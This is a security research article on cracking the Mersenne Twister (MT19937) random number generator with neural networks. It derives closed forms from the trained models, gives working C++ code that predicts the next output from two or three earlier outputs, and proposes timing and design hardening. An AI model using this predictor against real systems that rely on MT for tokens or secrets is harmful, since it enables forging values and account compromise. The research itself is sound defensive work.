The same concept applies to a more complex structured PRNG, namely Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still: not cryptographically secure) PRNG.  It can have a very long period of 32bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follows the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus more on this variant of MT.

2. How does MT19937 PRNG work?

MT can be considered as a twisted form of the generalized Linear-feedback shift register (LFSR). The idea of LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved in the form of a sequence of 32-bit words. The size of the internal state is different based on the MT variant, which in the case of  MT19937 is 624. The pseudocode of MT is listed below as shared in Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
           // Alternatively, seed with constant value; 5489 is used in reference C code[53]
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not get in-depth of its implementation as it is irrelevant to our goal. The main two functions we have are extract_number and twist. extract_number function is called every time we want to generate a new random value.  It starts by checking if the state is not initialized; it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called every 624 calls to the extract_number function again. After that, the code uses the number at the current index (which starts with 0 up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value. 

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

• (w, n, m, r) = (32, 624, 397, 31)
• a = 9908B0DF₁₆
• (u, d) = (11, FFFFFFFF₁₆)
• (s, b) = (7, 9D2C5680₁₆)
• (t, c) = (15, EFC60000₁₆)
• l = 18
• f = 1812433253

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps, twisting and tempering steps. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated to convert one of the 624 states to a random number. Hence, we are planning to use two NN models to learn each step separately. Then we will use the two models to reverse the whole PRNG by using the reverse tempering model to get from a generated number to its internal state then use the twisting model to produce the new state. Then, we can temper the generated state to get to the expected new PRNG number.

3.1 Using NN for State Twisting

After checking the code listing for the twisting function line 46, we can see that the new state at the position, i, depends on the variable xA and the value of the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and some constant a. And the value of the variable x depends on the old state’s values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:MT[i] = f(MT[i – 624], MT[i – 624 + 1], MT[i – 624 + m])

    = f(MT[i – 624], MT[i – 623], MT[i – 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32bits words of states. We then formatted these states into three 32bits inputs and one 32bits output. This would create around a five million records dataset (5 million – 624). Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the old three states at the specific locations described in the previous equation, 32-bit each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different models’ structures with different hidden layers and a different number of neurons in each layer. Then we used Keras’ BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as learning rate, … etc.). We used a small subset of the training set as the training set for this optimization. We have got multiple promising model structures. Then, we used the smallest model structure that had the most promising result.  

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights that connect the first 31-bit of the  96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effects on the output bits, and hence we can ignore them in our training. To check our observation with the MT implementation, we noticed that the state at position i is bitwise ANDed with a bitmask called upper_mask which, when we checked, has a value of 1 in the MSB and 0 for the rest when using r with the value of 31 as stated in MT19937. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65bits inputs instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of the parameters of the output layer is 3,104 (96×32 weights + 32 biases), which gets to a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

3.1.4 Model Results

After a few hours and manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states generated using a different seed than the one used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence if we got access to the three internal states at those specific locations, we could predict the next state. But, usually, we can get access only to the old random numbers, not the internal states. So, we need a different model that can reverse the generated tempered number to its equivalent internal state. Then we can use this model to create the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do model deep dive.

3.1.5 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.1.5.1 Model First Layer Connections

Each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65bits as input. Now, we would like to examine whether all 65 input bits have the same effects on the 64 output bits? In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the hidden layer, the 96 hidden nodes, of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, in x-axes, to the 96 hidden nodes in the hidden layer:

We can notice that the second bit, which corresponds to the second state LSB, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed corresponds to the if-condition that checks the LSB bit, and based on its value, it may XOR the new state with a constant value that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes as all the weights are close to zero. This can also be mapped to the code in line 12, where we bit masked the second state to  0x7FFFFFFF in MT19937, which basically neglects the MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can possibly get to the logic closed form using the trained model. Of course, we can derive the closed-form by building all the 65bit input variations and testing each input combination’s outputs (2^65) and derive the closed-form. But this approach is tedious and requires lots of evaluations. Instead, we can test the effect of each input on each output separately. This can be done by using the training set and sticking each input bit individually, one time at 0 and one time at 1, and see which bits in the output are affected. This will show how which bits in the inputs affecting each bit in the output. For example, when we checked the first input, which corresponds to MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

We can see that inputs 33 to 64, which corresponds to the last state, are affecting bits 0 to 31 in the output. We can also see that inputs 2 to 31, which corresponds to the second state from bit 1 to bit 30 (ignoring the LSB and MSB), affect bits 0 to 29 in the output. And as we know, we are using the XOR logic function in the state evaluation. We can formalize the closed-form as follows (ignoring bit 0 and bit 1 in the input for now): MT[i] = MT[i – 227] ^ ((MT[i – 623] & 0x7FFFFFFF) >> 1)

This formula is so close to the result. We need to add the effect of input bits 0 and 1. For input number 0, which corresponds to the first state MSB, it is affecting bit 30. Hence we can update the above closed-form to be: MT[i] = MT[i – 227] ^ ((MT[i – 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i – 624] & 0x80000000) << 1)

Lastly, the first bit in the input, which corresponds to the second state LSB, affects 15 bits in the output. As we are using it in an XOR function, if this bit is 0, it does not affect the output, but if it has a value of one, it will affect all the listed 15bits (by XORing them). If we formulate these 15 bits into a hexadecimal value, we will get 0x9908B0DF (which corresponds to the constant a in MT19937). Then we can include this to the closed-form as follows: MT[i] = MT[i – 227] ^ ((MT[i – 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i – 624] & 0x80000000) << 1) ^ ((MT[i – 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the ANDing will be 0, and hence the multiplication will result in 0. But if the LSB of the second state is 1, the result of the ANDing will be 1, and hence the multiplication will result in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular buffer as follows: MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) << 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering introduced in the code listing from line 10 to line 20. As we can see, a series of XORing and shifting is done to the state at the current index to generate the random number. So, we have updated the code to generate the state before and after the state tempering to be used as inputs and outputs for the Neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32 bit words of states and their tempered values. Then we used the tempered states as inputs and the original states as outputs. This would create a 5 million records dataset. Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state values and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameter that we need to decide is the number of neurons/nodes and hidden layers. We have tested different models’ structures with a different number of hidden layers and neurons in each layer, similar to what we did in the NN model before. We also used the smallest model structure that has the most promising result. Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 21,120 (32×640 weights + 640 biases), and the number of the parameters of the output layer is 20,512 (640×32 weights + 32 biases), which gets to a total of 41,632 parameters to train. We can notice that this model is much bigger than the model for twisting as the operations done in tempering is much more complex than the operations done there. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

3.2.3 Model Results

After manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered state to its original state. Hence, we can use this model to reverse the generated numbers corresponding to the internal states we need for the first model. Then we can use the twisting model to get the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do a model deep dive.

3.2.4 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.2.4.1 Model Layers Connections

After training the model, we wanted to test if any bits are not used or are less connected. The following figure shows the weights connecting each input, in x-axes, to the 640 hidden nodes in the hidden layer (each point represents a hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each bit in the input has more or less weight like others. We also plot in the following figure the connections between the hidden layer and the output layer:

The same observation can be taken from the previous figure, except that maybe bits 29 and 30 are less connected than others, but they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way, we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But, instead of doing so, we can derive a closed-form logic expression that uses the generated numbers at the positions mentioned in the first part to reverse them to the internal states, generate the new states and then generate the new number in one step. So, we plan to connect three models of the reverse tempering models to one model that generates the new state and then temper the output to get to the newly generated number as shown in the following figure:

Now we have 3 x 32 bits inputs and 32 bits output. Using the same approach described before, we can test the effect of each input on each output separately. This will show how each bit in the input bits affecting each bit in the output bits. The following table shows the input-output relations:

As we can see, each bit in the third input affects the same bit in order in the output. Also, we can notice that only 8 bits in the first input affect the same 6 bits in the output. But for the second input, each bit is affecting several bits. Although we can write a closed-form logic expression for this, we would write a code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate the sequence of the random numbers and match the generated numbers from the function with the next generated number from the library. The output was 100% matching for several millions of generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR, and if the result of the XORing of them is one, we XOR the result with a constant, 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two possible output values, with or without XORing the result with 0x44081102. Here is the code segment for the new function.

#include<tuple>
  
using namespace std;

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve them. Studying those issues can be particularly useful when MT is used as a part of cryptographically-secure PRNG, like in CryptMT. CryptMT uses Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito.

4.1 Normalizing the Runtime

As we described, MT consist of two steps, twisting and tempering. Although the tempering step is applied on each step, the twisting step is only used when we exhaust all the states, and we need to twist the state array to create a new internal state. That is OK, algorithmically, but from the cybersecurity point of view, this is problematic. It makes the algorithm vulnerable to a different type of attack, namely a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number, and when it is much longer, the start of the new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of 0.4 ms of the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number using the progressive formula we have created earlier. Using this approach, we have updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they got the exact sequences. Also, when we evaluated the mean of the runtime of both MT implementations over millions of numbers generated, the new approach is a little more efficient but has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning that can correlate a generated output from MT to three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step on the old state at once and generate the new state from it. This can be achieved by doing the twist step in a new state array and swap the new state with the old one after twisting all the states. This will make the state prediction more complex as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart. And all the new states from 227 to 623 will be using the value of the old states from 0 to 396, which are 227 apart. This slight change will generate a more resilient PRNG for the above-suggested attack, as any generated output can be either 227  or 397 away from the output it depends on as we don’t know the position of the generated number (whether it is in the first 227 numbers from the state or in the last 397 ones). Although this will generate a different sequence, the new state’s prediction from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the outcome PRNG, such as periodicity.

5. Conclusion

In this series of posts, we have shared the methodology of cracking two of the well-known (non-cryptographic) Pseudo-Random Number Generators, namely xorshift128 and Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of the generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, and we trained two different NN models to tackle each problem separately. Then we used the two models together to predict the next sequence number in the sequence using three generated numbers. Also, we have shown how to deep dive into the models and understand how they work internally and how to use them to create a closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be itself used where cryptographic randomness is required).

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared and the changes that are done.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It